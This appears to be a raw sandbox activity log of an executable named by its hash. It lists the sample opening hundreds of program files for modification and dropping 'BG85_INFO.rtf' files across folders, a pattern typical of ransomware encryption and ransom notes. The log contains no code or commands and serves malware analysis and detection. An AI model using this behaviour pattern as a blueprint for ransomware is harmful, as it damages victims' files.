c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Niue c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sv.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-PT.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\youtube.crx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoBeta.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\BG85_INFO.rtf 